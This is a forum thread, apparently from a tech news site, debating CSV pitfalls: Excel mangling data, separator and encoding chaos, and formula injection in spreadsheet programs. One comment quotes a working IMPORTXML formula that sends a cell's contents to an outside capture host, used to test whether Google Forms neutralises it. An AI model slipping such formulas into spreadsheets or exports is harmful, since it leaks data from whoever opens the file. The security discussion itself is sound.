Good luck with configuration if your CSV parser is ten layers removed from any human, and still needs to get it right. Now what? (Now we guess. We call it "heuristics," of course.)
That copies the data from the CSV file into a worksheet, you aren't editing the CSV file anymore.
I'm not just being pedantic, it makes a big difference. If I want to change some values in a spreadsheet I should be able to just open it, change the values, save, and be certain that the document will be identical apart from the deliberate changes. This is especially important for CSV files, which are commonly used for import/export operations.
I think I understand your use case, but in that case aren't there better apps for that? Excel is not a CSV editor. Even if they would look very similar...
If you open a .csv file in excel and save it, you may find that it has converted any long numbers into scientific notation for you, and saved that as text. It will also get rid of any leading zeros for you.
Also it will round those numbers silently to 15 digits.
It was a fun time explaining to accounting why their report showed duplicate billing events. Try telling an accountant "Don't use Excel". The solution of course was to prefix a "'" character, making the file useless outside of spreadsheet programs.
This is the classic response of the Excelista. "You're holding it wrong". Yeah well Excel is a hammer with two claws and no handle, there's no right way to hold it.
If Excel isn't for opening CSV files why does it associate itself with that extension by default? Why does it implicitly convert the CSV file to a half-assed Excel workbook? Why is there no option to change this behavior?
I haven't used excel in years, so your rant is a bit misdirected. There's a simple reason why it associates that way - it can open CSV files. Same as notepad associates to things which it's useless for. (but if you don't have anything else, it will work)
I'm just saying that editing CSVs regularly, preserving the formatting, while avoiding the import/export functionality is a very specific use case. It's likely not something excel project managers care about that much either. If the use case is popular, then there's going to be an editor that does it better. If not... tough.
Sorry, I didn't intend that rant to be directed toward you specifically. I just mean that your comment sounds like something those Excel project managers would tell me and I'm tired of hearing it.
After years of hearing "that's not what Excel is for" I am left wondering what it is for. I have asked many "Excel pros" how to solve some problem in Excel and I honestly can't think of any satisfactory answers. Just "that's not a common use case".
The CSV behavior is just one of the annoyances. Conflating display format with data type is another. Silently changing data is another. My list of gripes with Excel is long and on this topic my fuse is short.
My experience is that Excel is the Swiss Army Knife application, sufficing to do almost any job even if it's not the best choice. Being installed on almost every desktop means it becomes the first choice tool for almost any task.
> Semicolons are really better though, because they aren't used as a decimal separator unlike commas in most countries.
If you're going to separate values with semicolons--which is perfectly reasonable--I feel like you probably shouldn't do that with a format called Comma Separated Values.
Picking a less-common separator might help, but you could also just follow RFC 4180 and quote fields that have commas, then double any double quotes in values.
The only good CSV dialect is the differently named DSV (Delimiter Separated Values), where you select and support just one delimiter and require escaping of the delimiter character inside values. It's simple, it works. Quotes are hard to parse, so don't use those. Just \escape.
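A rough sketch of that dialect in Python, using a pipe as the single delimiter (any character would do); the only subtlety is that the reader has to walk the string and honour the escapes instead of naively splitting:

    DELIM = "|"

    def escape_field(field):
        # Backslash-escape backslashes, the delimiter, and newlines (backslash first).
        return (field.replace("\\", "\\\\")
                     .replace(DELIM, "\\" + DELIM)
                     .replace("\n", "\\n"))

    def split_row(line):
        fields, current, escaped = [], [], False
        for ch in line:
            if escaped:
                current.append("\n" if ch == "n" else ch)
                escaped = False
            elif ch == "\\":
                escaped = True
            elif ch == DELIM:
                fields.append("".join(current))
                current = []
            else:
                current.append(ch)
        fields.append("".join(current))
        return fields

    row = ["plain", "has | pipe", "back\\slash and\nnewline"]
    assert split_row(DELIM.join(escape_field(f) for f in row)) == row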
Unicode is vast. There's absolutely no good reason we don't have Snowman Separated Values (or some other proper separator sign that isn't commonly used elsewhere) other than that people don't demand it.
Where can I find those on my keyboard? Entering escape sequences by hand isn't user friendly, if it works at all. One of the benefits of csv is that it's universal, I can open it in vim or write an awk script to extract values, someone else can open in notepad++, someone else should be able to open in excel.
Just thinking out loud here, but isn't part of the point that they are not keyboard characters? If they're on the keyboard, then they will pop up in ordinary text, similar to the | (pipe) character and friends.
They are ^\ ^] ^^ and ^_, respectively. Of course, most text editors will interpret those keys as something else. In emacs you can enter them literally by using C-q (quote) first.
Since we're kind of talking about things from an I18N perspective, those characters are written like this on a bog standard Swedish keyboard:
\ is AltGr+?
] is AltGr+9
^ is Shift+^, then space
_ is Shift+-
AltGr is the right Alt key, to the right of the space bar.
So none of those are single keys, which means that combining them with Ctrl to write control characters becomes almost comically difficult. Not very accessible to typical users, I'd say.
Actually \ is AltGr++, i.e. "+" is the symbol you get from that key without any modifier. With shift you get ? and with AltGr you get \. My bad, and too late to edit.
While XLSX is proprietary by descent, it is standardized; thus, it's readable/writable by man and machine alike (essentially a zipped XML with some bells and whistles). I have not encountered a less broken format that is similarly widespread.
Well, some of the issues are shared between CSV and XLSX. However, it does have a clear distinction between structure (which also can be validated!) and content (which moots the issue with comma-semicolon-tab separation), a well-defined character set and somewhat-sane character escaping rules.
It does have similar "executability" issues as CSV (and more), but 1. the formula evaluation is documented and expected behavior, 1b. there is a documented way to suppress it, and 2. programs reading it are aware that security is a thing, and either a) constrain/sandbox it (in the case of table processors such as MSOffice or LibreOffice), or b) don't execute its macros and expansions at all (in the case of libraries such as PhpExcel). Not sure about the Google Docs issue.
(As far as "common knowledge" - knowledge for manual inspection of strings is IMNSHO not required, all that's needed is that it's program-readable; in this respect, most table processors are capable of this. The point "but you can inspect CSVs by hand" comes from experience: it is also possible to inspect binaries by hand, neither of these is intuitive, both are a learned skill)
Interestingly, genetic biologists are probably more aware of this problem than most. When importing a CSV containing gene names such as SEPT2 or MARCH1, they automatically get converted to dates by Excel. This has potentially had a fairly large effect on research in the area [1]. One of the many reasons we insist on only using Ensembl IDs for genes at my company.
I noticed this in the data of some scientists I work with. Another awful thing is that when you tell them they need to format the column as text to prevent this in the future, before the data is put in the column (very important!), they'll eventually try to apply it to their existing fubar spreadsheets as well - in which case the "date-recognized" genes become ... large numbers representing the number of days since 1900, totally unrecognizable.
FWIW, I (not a biologist, though) only use LibreOffice for importing CSV these days. It allows me to look at the fields first and tell it if I want to suppress special treatment of data in a column.
EDIT: LibreOffice also allows you to tell it what encoding a file uses and what character(s) are used as separators.
Just curious, but what about non-vertebrates?
I'd have expected there to be an official number/hash that identifies genes like the InChI Key for chemistry or something. IIRC, that key in particular is just a SHA-256 of a long human-readable "chemical formula".
We'll cross that bridge when we come to it I guess, but we work almost exclusively with human and mouse genomes for now.
In any case, I imagine the Ensembl ID is still safer than other encodings in the case of invertebrates. For example, gene IDs in the fruit fly genome look like FBgn0034730.
Slightly off-topic, but maybe we need a fully standardized and unambiguous CSV dialect with its own file extension. Or maybe just use SQLite tables or Parquet?
Some things I dislike about CSV:
* No distinction between categorical data and strings. R thinks your strings are categories, and Pandas thinks your categories are strings.
* I'm not a fan of the empty field. Pandas thinks it's a floating point NaN, while R doesn't. So is it a NaN? Is it an empty string? Does it mean Not Applicable? Does it mean Don't Know? Maybe it should be removed altogether.
* No agreement about escape characters.
* No agreement about separator characters.
* No agreement about line endings.
* No agreement about encoding. Is it ASCII, or UTF-8, or UTF-16, or Latin-whatever?
* None of the choices above are made explicit in the file itself. They all have the same extension "CSV".
These use up a bit of time whenever I get a CSV from a colleague, or even when I change operating system. Sometimes I end up clobbering the file itself.
Good things:
* Human readable.
* Simple.
I think the addition of some rules, and a standard interpretation of them, could go some way to improving the format.
See, one of the reasons CSV managed to get so ubiquitous is precisely because all those things are unspecified. CSV is not a popular format; CSV is the name we give 960 visually similar but very different formats that as a collective are popular.
The thing you use CSV for is not its technical merit. You use CSV for its ubiquity. If you nailed down all those things you talk about, you would have a much, much smaller user base and there would be no reason to use CSV in the first place.
(Hey, this reminds me of a similar situation governing s/CSV/C/g...)
> No distinction between categorical data and strings. R thinks your strings are categories, and Pandas thinks your categories are strings.
I think this is more of an R-ism than a standardization issue. Strings are a pretty universal data type, whereas categorical data (factors) are mostly specific to the domain of statistical modeling. IMO Python is doing the correct thing here. Personally I find factors to be more trouble than they are worth, and fortunately `data.table::fread` mimics Python in this regard.
Yes, through the "Import" feature. Excel will in that case allow you to choose what "type" each column in the CSV has (and will not parse text if given the "text" type). The problem is that a lot of users (myself included) will use muscle memory and double-click a CSV file in windows explorer rather than opening up Excel and initiating an import.
Because you can create documents with formulas, save them as CSV, and open them again. If it did an import when opening, the operation save A -> load A would produce a different result from the file you had when you clicked save.
Or at least this is the most logical explanation I could find.
Agree it is completely absurd to allow formulas in a CSV file, let alone code.
I have never seen a way to disable a full recalculation when Excel opens a CSV file, which beyond the security implications is painful for people like me who keep their calculations on manual because I often have very heavy workbooks opened all the time.
My first thought was this dead-simple solution: just pop up a prompt when opening CSVs. "Do you want to run formulas from this CSV file?" No need for complicated import wizards, just a simple yes/no.
Sure. I was just trying to come up with the simplest possible thing as a counter to the author's "it's too hard to fix vulnerabilities in existing spreadsheet programs" assertion. Microsoft and Google could probably bang out a dialog like that in a week if they were motivated.
Sorry to balk, but I'm more outraged at the title: another "injection" I need to talk about that isn't really one. The root cause is the interpreter executing untrusted input; the same can be said about macros or any other file type. The perception is that most people open CSV files on a regular basis and consider them safe or not interpreted, when it appears they are.
Well, it catches folks by surprise. We could abstract all computer vulns down to a few broad computing concepts, but that isn't as useful.
This one is: your data turned out to be code. There are many, many books on all the various forms this takes. Memory corruption cat and mouse... It is a long, complex story that we can sweep up into that generalization. But it is important to know the high, medium, and low levels of these issues. They form a gigantic tree. The medium level, somewhere in between, is where devs need to threat model most of the time. But some of the time things are very specific and you just need to know about the specific thing and not its various generalized forms, because the specific thing can really matter. E.g. simple programming mistakes lead to side channels, etc. We can generically understand a side channel easily. But it takes a ton of specific hard-earned knowledge to avoid it.
It kind of is more useful to abstract them, so we're not whack-a-moling the current hype or hot title of the day and can focus on the fundamental issues.
I agree, it catches people off guard to think CSV files once interpreted can do more than give columns of information, but it's not an injection which is my beef.
You have to do both. When something unusual comes up it is good to file it away as a possibility. To be fair, these have always been "obvious" on pentests. When you start from the point that all input is dangerous and ask how you can abuse this one, it becomes the logical conclusion to put in an Excel formula. That is your point, I think. But my experience has told me some inputs are just assumed safe, even by developers who program defensively. So you have to embrace both, IMO.
This seems like an appropriate place to suggest that anyone who finds these kinds of attack vectors interesting should check out the bug bounty program for my current place of work, which processes loads of CSV and Excel files from government customers.
(But please, just do me a small favor and don't submit any reports for SQL injection or information disclosure if you're using the SQL-like API that we expressly provide for the purpose of accessing public data. We get a couple clueless people sending such reports every week.)
This brings XSS to a whole new level. Imagine what happens if you know some of what you post in a website as a user eventually gets reviewed by somebody who gets it through a CSV dump.
Makes me wanna troll ops people at my own startup just for funsies.
This used to be common with txt files and IE's terrible practice of sniffing content. It would see a txt file that contained HTML and display the HTML instead; it could then pull in a secret Silverlight file that was masquerading as a docx file, as they are both simply zip files. Even more amusingly, Silverlight and docx contents don't clash, so it could still be a valid docx file if you opened it, and the txt file would look like txt even though it was really rendering HTML with a hidden Silverlight app.
In case anyone else was wondering about Google Forms: I tried inputting =IMPORTXML(CONCAT("https://requestb.in/15z4vk51?f=",H8),"//a") into a text field and Google automatically appends a "'" so that '=IMPORTXML does not execute.
At least here (Italy) CSV is not commonly used (because of the different way we use the comma as a decimal point) and the default (in Excel) separator is then set to a semi-colon.
A more common format is TSV (TAB delimited) which makes a lot more sense, however the best choice when importing data in Excel is still to change the file extension to a non-recognized extension (like - say - .txt) and in the "import wizard" set the appropriate separator and set all columns as "text".
On the first attack vector: Google Security has a nice post about it [0] and why they do not consider it a valid threat. This is their reasoning:
> CSV files are just text files (the format is defined in RFC 4180) and evaluating formulas is a behavior of only a subset of the applications opening them - it's rather a side effect of the CSV format and not a vulnerability in our products which can export user-created CSVs. This issue should be mitigated by the application which would be importing/interpreting data from an external source, as Microsoft Excel does (for example) by showing a warning. In other words, the proper fix should be applied when opening the CSV files, rather than when creating them.
Their policy makes it sound like the second vulnerability should indeed be fixed in Google Sheets itself (it is the one opening the file, after all).
CSV is a mess (are a mess?), but all these vulnerabilities have to do with spreadsheet applications' consumption of CSVs. There are very legitimate reasons a CSV might include fragments of potentially executable code, after all.
Like it or not, Excel's behavior defines the CSV file format and how it is used in the real world. The writing of an RFC 15 years too late has not and will never "fix" CSV. It's crusted over with bugs and inconsistencies for all time.
Use anything else, even XLSX which is at least a typed and openly standardized format.
When you import a CSV file into Google Sheets (File -> Import), you can choose in the dialog to convert text to numbers and dates. If you choose not to convert, Google Sheets places a single quote (') before the function.
My Excel 2010 doesn't execute shell code from author's example. Heck, it doesn't even parse CSV and loads everything into one column as text. What am I doing wrong?
As weird as it sounds, it might be related to your system region settings, specifically the decimal point sign and the thousands separator sign. I've been only able to open CSVs by manually importing them with Excel's 'import data from text file' function.
CSV is a pretty poor format in that it mixes the presentation and the underlying values. There is no standard for dates (dd/mm/yyyy or mm/dd/yyyy ?). The "standard" RFC4180 is extremely vague when discussing value interpretation. As proprietary as XLSX is, at least the Excel format separates the raw values from the presentation.
Except if your raw value begins with a "'". Or if it is 2017/10/10, or 10/10/2017, then it may be represented by an integer with a format of "date". Or if your raw value is 1234567890123456789, then you get a string like '1.23456789012345e18', complete with modified data. Or if it begins with an "=" which could result in basically anything as the article points out.
Excel conflates the idea of display format and data type which is the source of countless headaches. It is legacy pain in the purest form.
I'm going to interpret your comment as high praise. If you object to that interpretation, I'll dismiss your objection as just an argument over semantics. :)